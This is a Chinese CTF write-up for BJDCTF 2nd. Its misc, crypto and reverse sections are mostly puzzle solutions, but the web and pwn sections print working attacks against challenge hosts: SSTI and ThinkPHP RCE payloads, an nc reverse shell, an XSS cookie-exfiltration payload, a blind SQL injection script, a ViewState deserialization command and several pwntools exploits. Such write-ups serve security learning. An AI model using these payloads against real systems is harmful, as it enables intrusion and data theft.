Fork me on GitHub

BJDCTF 2nd write up

字数统计: 4.1k字   |   阅读时长≈ 21分

BJDCTF 2nd write up

[TOC]

MISC

最简单的misc-y1ng

1.伪加密//据说有,但是我用360压缩直接打开了

2.winhex打开 补全png头 可以打开png

3.得到一串16进制字符 转字符串即可

BJD{y1ngzuishuai}

A_Beautiful_Picture

linux打不开 crc错误

1.宽高问题

2.crc问题

修改高1000得到flag

BJD{PnG_He1ghT_1s_WR0ng}

小姐姐-y1ng

直接搜索BJD得到flag

BJD{haokanma_xjj}

EasyBaBa

图片挺大的先binwalk试一下

1
2
3
4
5
6
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
6702845       0x6646FD        MySQL MISAM index file Version 9
20891106      0x13EC5E2       End of Zip archive

分离后得到zip

JPG打不开..

发现是avi头,先打开看一下有二维码闪过。

通过ps进行修复

6167696E5F6C

6F76655F59

424A447B696D

316E677D

为base64

agin_l

ove_Y

BJD{im

1ng}

排一下顺序

BJD{imagin_love_Y1ng}

Real_EasyBaBa

相比easybaba文件就比较小。还是过一遍binwalk

1
2
3
4
5
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
28673         0x7001          End of Zip archive

末尾有zip 但是foremost分离不出来。我们手工分离一下。。

winhex位置0x6e80

得到hint

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
                                                              
                                                              
##############    ##      ##    ##########  ##############    
##          ##  ####  ####  ######  ##      ##          ##    
##  ######  ##    ######      ##    ##      ##  ######  ##    
##  ######  ##  ####  ##  ##      ##        ##  ######  ##    
##  ######  ##      ##  ##      ##  ####    ##  ######  ##    
##          ##  ##  ##        ####          ##          ##    
##############  ##  ##  ##  ##  ##  ##  ##  ##############    
                        ##    ##        ##                    
##########  ##########  ####  ##  ##  ######  ##  ##  ##      
##    ####    ##  ##      ##    ##  ######  ##############    
####      ######  ##  ####  ####    ##    ##    ####  ##      
######  ####    ########    ######        ##########  ##      
####  ########    ##  ##  ##  ######              ######      
####      ##  ########  ##  ##  ##  ####  ##########  ####    
    ##########  ##        ##  ##        ####  ##    ####      
##########    ####  ##  ##    ##    ######    ##  ##  ##      
######    ####          ####  ##  ####            ####        
########        ##        ####      ######  ##  ####  ####    
##  ##  ########      ####    ##    ##                        
##    ##      ##      ##      ####  ######  ####  ##    ##    
##  ####    ####      ##        ######################  ##    
                ####    ####    ######  ##      ##  ######    
##############  ######    ######      ####  ##  ##            
##          ##    ####  ####  ##      ####      ##            
##  ######  ##  ####    ##  ####  ####  ##################    
##  ######  ##  ##                        ##          ####    
##  ######  ##  ##########    ##          ####  ####  ##      
##          ##  ########    ##  ##    ####  ##  ##    ##      
##############  ########      ##########  ####  ##  ##

远处看是二维码。。

手机扫不出来

QRcode

1
od -vtx1 ./draw.png | head -56 | tail -28

得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
0000700 01 00 02 10 03 10 00 00 01 ee c0 b8 a6 00 00 00
0000720 ff ff ff 00 ff ff ff ff 00 ff ff 00 00 00 ff ff
0000740 ff 00 ff 00 00 00 ff 00 00 ff 00 ff 00 00 ff 00
0000760 ff 00 ff 00 00 00 ff 00 00 ff 00 ff 00 00 ff 00
0001000 ff ff 00 00 00 00 ff 00 00 ff 00 ff 00 ff 00 00
0001020 ff 00 ff 00 00 00 ff 00 00 ff 00 ff 00 00 ff 00
0001040 ff 00 ff 00 ff 00 ff 00 00 ff 00 ff 00 00 ff 00
0001060 ff ff ff 00 ff ff ff 00 00 ff ff 00 00 00 ff ff
0001100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0001120 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff 00 00
0001140 ff 00 00 00 00 00 ff 00 00 00 ff 00 00 ff 00 00
0001160 ff ff ff 00 00 00 ff 00 ff ff ff 00 00 ff 00 00
0001200 00 00 ff 00 00 00 ff 00 ff 00 00 00 00 ff 00 00
0001220 ff ff ff 00 00 00 ff 00 ff ff ff 00 ff ff ff 00
0001240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0001260 ff ff ff 00 ff 00 ff 00 ff ff ff 00 ff ff ff 00
0001300 ff 00 00 00 ff 00 ff 00 ff 00 ff 00 00 00 ff 00
0001320 ff ff ff 00 ff ff ff 00 ff ff ff 00 00 00 ff 00
0001340 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00
0001360 ff ff ff 00 00 00 ff 00 ff ff ff 00 00 00 ff 00
0001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0001420 ff ff ff 00 ff ff 00 00 00 00 00 00 00 00 00 00
0001440 ff 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00
0001460 ff ff ff 00 00 ff 00 00 00 00 00 00 00 00 00 00
0001500 ff 00 ff 00 00 ff ff 00 00 00 00 00 00 00 00 00
0001520 ff 00 ff 00 00 ff 00 00 00 00 00 00 00 00 00 00
0001540 ff ff ff 00 00 ff 00 00 00 00 00 00 00 00 00 00
0001560 00 00 00 00 ff ff 00 63 da e9 3c 36 b1 aa 93 59

看了官方才知道,把00去掉就能看出flag了..

BJD{572154976}

圣火昭昭-y1ng

1
2
文件属性发现
新佛曰:諸壽隸僧壽降吽壽諸壽陀壽摩隸僧缽薩願心壽咤壽囉寂壽闍諸壽哆壽慧壽聞壽色吽愍壽所壽蜜如

新佛曰:http://hi.pcmoe.net/buddha.html

得到

1
gemlovecom

脑洞啊 全靠

outguess隐写

outguess -r 1.jpg -t 1.txt

1
outguess -k "gemlove" -r 1.jpg 1.txt

得到

BJD{wdnmd_misc_1s_so_Fuck1ng_e@sy}

TARGZ-y1ng

想不出来 看的wp

300次压缩 下一个压缩包密码是下一个的名字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#www.gem-love.com
#decompress.py
import os
import filetype
import time
 
while 1:
	aa = os.popen('ls')
	filename = aa.read().replace('decompress.py','').replace('\n', '')
	a = filename.replace('.tar.gz', '')
	kind = filetype.guess(filename)
	if kind.extension is 'zip':
		os.system("mv {} {}.zip|unzip -P {} {}.zip".format(filename, a, a, a))
		os.system("rm *.zip")
		time.sleep(0.1)
	else:
		print('解压完成')
		break

BJD{wow_you_can_rea11y_dance}

Imagin - 开场曲

听力题//我是听不出来

1
2
3
4
5
6
1.大写
2.mikutap
3.开场曲重复了两遍
4.flag交一遍的就行
5.格式BJD{字母+数字}
6.数字范围0-5

BJD{MIKUTAP3313313}

crypto

签到-y1ng

base64解密

BJD{W3lc0me_T0_BJDCTF}

老文盲了

吐了。。

http://www.duchulai.com/让他读出来。。就知道了

BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}

cat_flag

显然01,之后二进制转字符串

BJD{M!a0~}

灵能精通-y1ng

image

圣堂武士编码

BJD{IMKNIGHTSTEMPLAR}

燕言燕语-y1ng

16进制转字符串

yanzi ZJQ{xilzv_iqssuhoc_suzjg}

维吉尼亚解码

BJD{yanzi_jiushige_shabi}

Y1nglish-y1ng

使用https://quipqiup.com得到

BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4cy}

但是有单词错误

cracy不知道啥意思改成crack正确

BJD{pyth0n_Brut3_f0rc3_oR_quipquip_AI_Cr4ck}

rsa0

1
2
3
4
5
6
7
e=11834969

p+q=25909481998527597352565069944814606244971029699646367244003562405186565340952341619983795083044659218779311384894959740187117410666378075219544179662961812

p-q=-881695587581155143389971059081173629990684657306891581762101768765925523067185618970184922305572841745973346148784834482154309243476575844945498592295294

c=160954535544959447807111086673248857698978057451300691062648556192391326212939892079469921995350820933522724182862182914169408720158822872035522820921473598247979648556345419676135307891858807845436010936080770419035276776953605711270399920870235237117993026642804747756807698078498722630394169076977801001118

得到p,q;从而得到d,可以计算出m

1
2
3
4
5
6
7
8
9
10
11
import gmpy2
from Crypto.Util import number
e=12820879
paq=22035538670889005763411346398188449828911284840345328160261913313226922243903640186051004333184175934985590738487970782950850769889017301738579320767563604
psq=-2616687740098848296531856681549028773761500895466635575611042725318249385942319978624580589818611632411208541237433234957285775684615140541031424858927618
c=63429897001235842596733118756386881780164898782046881450552816549401778891793459480050856041691198931891631850185841945327259580257701334694328660248355158394695998869152900121288763261566072460165128360649173228270012193359059601535865008029486495136118069938486695657407934083528644355174908663965015161231
p = (paq+psq)/2
q = (paq-psq)/2
d = gmpy2.invert(e, (p-1)*(q-1))
m = pow(c, d, p*q)
print( number.long_to_bytes(m) )

动态flag

rsa1

p,q不变。e c变化。

考虑共模攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from gmpy2 import invert
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)
c1 = 13059791912290365884110457098731665586853663227859975324515452483248905712995283805657895279103503078568984817560562327990551296032014337307204702778294678463169670457941035460849924417314753714582332912610743410503116636862265402037224321440198903389671800616624073975596493722449281409536490964633918247152
e1 = 15492881
c2 = 12538641982922201980998233655522552860417752256884018604119802482922607625017051430692995951603938523604896976835379622478935236345224594163403128407121088386944976580418447285730657292885859668906194539671729079742749489618586637025994402233749014218891190841419156399172795547808592832028572876480664570767
e2 = 14181799
A = 141705753777904930180186345152697719960529271724365505667588476081668022124314860399036949077434585591169427333761343028657656047447722131571881186462988570427862629528991007547683269938572556466491551151797214333916297821603322882083405345912527685342207853111914232514891591341485863652948034805165736236490
B = -156153155641599491125048710150137099645478510338200983903514608918666436450311285805383608815127180821966064543429131837653238097144992849084996291260802
n = (A-B**2)/2
# print n
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
if s1<0:
    s1 = - s1
    c1 = invert(c1, n)
elif s2<0:
    s2 = - s2
    c2 = invert(c2, n)
m = pow(c1,s1,n)*pow(c2,s2,n) % n
print hex(m)[2:].decode('hex')

动态flag

reverse

guessgame

用了几次就猜到了数2333 然而没啥用

ida搜索字符串得到flag

8086

本来想dosbox直接跑,结果死循环。。

ida查看 因为硬编码的问题代码被解析为了数字。

c转化为汇编。发现是数据进行了异或

异或即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
DATAS SEGMENT
    str1 DB 5dH,55H,5bH,64H,75H,7eH,7cH,74H
    DB 40H,7bH,7aH,40H,77H,6aH,2eH,7dH,2eH
    DB 7eH,71H,40H,67H,6aH,7aH,7bH,7aH,40H
    DB 77H,7aH,71H,57H,7eH,2fH,62H,59
DATAS ENDS

STACKS SEGMENT
STACKS ENDS

CODES SEGMENT
    ASSUME CS:CODES,DS:DATAS,SS:STACKS
loc:
    jmp loc
    mov CX,34
    lea BX,str1
    
lop:
    mov DI,CX
    dec DI
    xor BYTE PTR [BX][DI],31
    loop lop
    lea DX,str1
    mov AH,09H
    int 21H
    ret
START:
    MOV AX,DATAS
    MOV DS,AX
    call loc
    MOV AH,4CH
    INT 21H
CODES ENDS
    END START

其他人的wp:

1.dosbox debug直接通过a命令直接把jmp loc改成两个nop,在通过g命令执行就行

2.调试器手动改EIP执行

//还是第一次逆dos文件 太菜了

diff2

这个是我不知道什么时候新增的。赛后才看见。

通过ssh把diff文件下载到本机

程序基本看一下。只有

1
2
3
4
_start
exit
compare
print

有漏洞的地方只有可能在compare

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int compare()
{
  char v0; // al
  unsigned int i; // [esp+0h] [ebp-8h]
  int v3; // [esp+4h] [ebp-4h]

  v3 = 0;
  for ( i = 0; buf2[i] + buf1[i] && i < 0x400; ++i )
  {
    v0 = buf1[i];
    if ( v0 != buf2[i] )
      return v3 + 1;
    if ( v0 == 10 )
      ++v3;
  }
  return 0;
}

char型变量占1个字节,相当于unsigned byte,表示范围是0x0-0xff,那么两char相加的范围就是0x0 - 0x1fe ,可是char型只能存储1个字节的数据,因此两char相加产生的进位就会被忽略。举个栗子,0x7d+0x83=0x100->0x0。

所以如果buf2[i]+buf1[i]=0x100就会终止for循环

每次返回一个进行爆破即可

//脚本不太会写,参考一下官方

刚开始我还在想脚本文件无法上传改怎么执行。

直接python就可以执行了。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from subprocess import *
fix = ''
while 1:
    for i in range(0x100):
        payload = fix+chr(i)
        f = open('/tmp/abc','w+')
        tmp = f.write(payload)
        f.close()
        p = Popen(['/home/ctf/diff','/tmp/abc','/home/ctf/flag'],stdout=PIPE)
        res = p.stdout.read()
        if res != '1':
            # print res,chr(0x100-i)
            print fix
            fix+=chr(0x100-i)
            break

web

fake google

随便输入一个字符串,搜索后f12

1
<!--ssssssti & a little trick --> P3's girlfirend is : 1<br><hr>

有回显

显然为ssti

1
qaq?name=?name={{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

得到flag

基本没过滤吧。。

old-hack

thinkphp5.0.23框架

网上找到分析https://blog.csdn.net/xuandao_ahfengren/article/details/86333189

1
2
http://c821414e-e52d-4da1-a324-5ee03b7a5880.node3.buuoj.cn/index.php?s=captcha
POST _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

ls ../../../../才找到flag..吐了

duangShell

1
2
how can i give you source code? .swp?!
where is P3rh4ps's girl friend ???

http://dc767036-dae6-4291-b494-e1b65b32403d.node3.buuoj.cn/.index.php.swp

得到swp文件(刚开始index前忘记加. 还以为记错了。。

下载之后 先vi -r index.php.swp进入就不是乱码了

这里利用反弹shell来读取flag。需要在buuoj basic创建linux labs//刚开始用自己的服务器..gg

girl_friend=nc ip port -c sh

简单注入

http://www.freesion.com/article/2367234678/原题

改简单?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
url = "http://5bbb28ab-cb82-4a2c-bf6f-a8982385774b.node3.buuoj.cn/"
result = ''
for x in range(0, 100):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = "or/**/if(ascii(substr((database()),%d,1))>%d,1,0)#" % (x, mid)
        # p3rh4ps
        payload = "or/**/if(ascii(substr((password),%d,1))>%d,1,0)#" % (x, mid)
        #payload = "or/**/if(ascii(substr((sel/**/ect/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/li/**/ke/**/0x70337268347073/**/limit/**/0,1),%d,1))>%d,1,0)#" % (x, mid)
        #payload = " or if(ascii(substr((select column_name from information_schema.columns where table_name=0x70337268347073 limit 0,1),%d,1))>%d,1,0)#" % (x, mid)
        #password
        #payload = " or id=if(ascii(substr((select password from users limit 0,1),%d,1))>%d,1,0)#" % (x, mid)
        data = {
            'username':'\\',
            'password':payload
        }
        response = requests.post(url, data=data)
        if 'You' not in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    result += chr(int(mid))
    print(result)

得到密码

1
OhyOuFOuNdit

登陆可以得到flag

假猪套天下第一

主要利用好MDNhttps://developer.mozilla.org/en-US/docs/Web/HTTP/Headers

登陆时抓包得到

1
<!-- L0g1n.php -->

访问告诉我们

Sorry, this site will be available after totally 99 years!

cookie中有time时间戳 修改时间

Sorry, this site is only optimized for those who comes from localhost

Client-IP: 127.0.0.1

Sorry, this site is only optimized for those who come from gem-love.com

Referer: gem-love.com

Sorry, this site is only optimized for browsers that run on Commodo 64

User-Agent: Contiki/1.0 (Commodore 64; http://dunkels.com/adam/contiki/)

Sorry, this site is only optimized for those whose email is root@gem-love.com

From: root@gem-love.com

Sorry, this site is only optimized for those who use the http proxy of y1ng.vip<br> if you dont have the proxy, pls contact us to buy, ¥100/Month

Via: y1ng.vip

得到base64解密为flag

Schrödinger

脑洞有点大 看的wp

有个jQuery.js调用其他函数,说明这个jQuery.js有问题的

其中跟成功率有关

cookie的dXNlcg

值是base64加密的

改成0的base64

得到一个av号。。

评论取找到flag

BJD{Quantum_Mechanics_really_Ez}

xss之光

扫描发现有git泄露

得到源码

1
2
3
<?php
$a = unserialize($_GET['yds_is_so_beautiful']);
echo $a;

结合名字知道应该是用xss

原生类序列化

https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

1
2
3
4
<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>

elementmaster

两个标签被隐藏

16进制转字符串标签名

Po.php打开只有个.

之后…看脑洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import os
import requests
req = requests.session()
url = "http://00157c88-ef09-44e9-93e8-f01a1f3e4c80.node3.buuoj.cn/"
yuansu = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
        'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 
        'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 
        'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 
        'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 
        'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
        'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
for y in yuansu:
   t1 = url + y +".php"
   t2 = req.get(t1)
   if t2.status_code == 200:
       print(y)
   else:
       continue

考察元素周期表。每个访问后拼接得到

1
And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

查看得到flag

文件探测

1
2
<!-- Inheriting and carrying forward the traditional culture of the first BJDCTF, I left a hint in some place that you may neglect  -->
<!-- If you have no idea about the culture of the 1st BJDCTF, you may go to check out the 1st BJDCTF's wirteup that can be found in my blog -->

不知道啥用。先放着。

扫描有robots.txt

1
2
3
4
User-agent: *
Disallow: /flag.php
Disallow: /admin.php
Allow: /index.php

其中admin.php

1
2
only 127.0.0.1 can access! You know what I mean right?
your ip address is 174.0.222.75

抓包发现home.php

http://c98eb18f-2ba9-458e-b1ad-203080b2e7c7.node3.buuoj.cn/home.php?file=system

官方hint SSRF?

可以使用协议读取文件

1
file=php://filter/convert.base64-encode/resource=system

对system.php审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
   echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
   header("Refresh:0.1;url=index.php");
   die;
}
<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
   $url = $_POST['q2'].".y1ng.txt";
   $method = $_POST['q3'];

   $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

   echo $str1;

   if (!preg_match($filter1, $url) ){
       die($str2);
   }
   if (preg_match($filter2, $url)) {
       die($str3);
   }
   if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
       die($str4);
   }
   $detect = @file_get_contents($url, false);
   print(sprintf("$url method&content_size:$method%d", $detect));
}

?>

q1=aaa&q2=http://localhost/admin.php?a=&q3=GET%s%

可以绕过得到admin.php//类似极客大挑战中的SSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}


?>

我们是可以删除phpsessid验证ip判断不会影响后续flag。只需要判断是否本地ip以及decrypt。

1
2
3
4
5
6
7
<?php
$data = '';
$method = 'AES-128-CBC';
$key = 'y1ng';
$iv = md5('174.0.222.75', true);
$result = base64_encode(openssl_encrypt($data, $method, $key, OPENSSL_RAW_DATA,$iv));
var_dump($result);

从而得到flag

EasyAspDotNet

1
2
Hint1:web.config
Hint2:Viewstate

之前没怎么搞过asp

1
<img id="image1" src="/ImgLoad.aspx?path=1.png" /><br>

估计有文件包含

直接访问打不开

1
curl http://c6553c61-e331-480a-a2e0-c512c831f751.node3.buuoj.cn/ImgLoad.aspx?path=../../web.config
1
2
3
4
5
6
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<machineKey validationKey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" decryptionKey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5" validation="SHA1" decryption="3DES" />
</system.web>
</configuration>

https://www.4hou.com/posts/GYq7

https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/

CVE-2020-0688ASP.NET VIEWSTATE反序列化漏洞

generator在源码中找到。

validationKeydecryptionKey也已经知道。

利用需要工具

https://github.com/pwntester/ysoserial.net

1
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9"

得到

1
4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABkAGcAcABrADUAcgBsADUALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABkAGcAcABrADUAcgBsADUALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAADgNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEVgAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL

添加cmd变量即可rce

cmd=type c:\Fl@g_glzjin_still_w@nts_a_girl_friend.txt

pwn

r2t3

整型溢出

https://blog.csdn.net/koozxcv/article/details/50295805

v3是int8最大256 所以256+1强制转化为1 这里用261

1
2
3
4
5
6
7
8
9
10
11
12
#encoding=utf-8
from pwn import *

p = remote("node3.buuoj.cn","26901")

sys = 0x0804858B
payload = 'a'*(0x11)+'b'*4+p32(sys)
payload +='c'*(261-len(payload))
p.sendlineafter("your name:\n",payload)

p.recv()
p.interactive()

one_gadget

1
2
3
one_gadget /libc-2.29.so
more /proc/21546/maps
找one_gadget以及libc的基地址

得到地址

1
0xe237f,0xe2383,0xe2386,0x106ef8
1
2
3
4
5
6
7
8
9
10
11
from pwn import *
p = remote("node3.buuoj.cn","28582")
libc = ELF("./libc-2.29.so")

p.recvuntil("here is the gift for u:0x")
leak = int(p.recv(12),16)
print hex(leak)
base = leak-libc.sym["printf"]
print hex(base)
p.sendlineafter('Give me your one gadget:',str(base+0x106ef8))
p.interactive()

ydsneedgirlfriend2

指针free后未清零 造成UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import*

elf = ELF("./ydsneedgirlfriend2")
libc = ELF("libc-2.27.so")
p = remote("node3.buuoj.cn","25305")

back_door = 0x400D86

def add(sz,text):
    p.sendlineafter("choice :","1")
    p.sendlineafter(":",str(sz))
    p.sendlineafter(":",text)

def dele(idx):
    p.sendlineafter("choice :","2")
    p.sendlineafter(":",str(idx))

def show(idx):
    p.sendlineafter("choice :","3")
    p.sendlineafter("choice :",str(idx))

add(0x20,'aaaa')
add(0x20,'aaaa')
dele(0)
dele(0)
add(0x10,'a'*8+p64(back_door))
show(0)
p.interactive()

r2t4

格式化字符串写__stack_chk_fail 函数来 bypass canary

1
2
3
4
5
6
7
8
from pwn import *
context.log_level = 'debug'
p = process('./pwn')
elf = ELF('./pwn')
__stack_chk_fail=elf.got['__stack_chk_fail']
pay = "%64c%9$hn%1510c%10$hnAAA" + p64(__stack_chk_fail+2) + p64(__stack_chk_fail)
p.sendline(pay)
p.interactive()

test

1

1
2
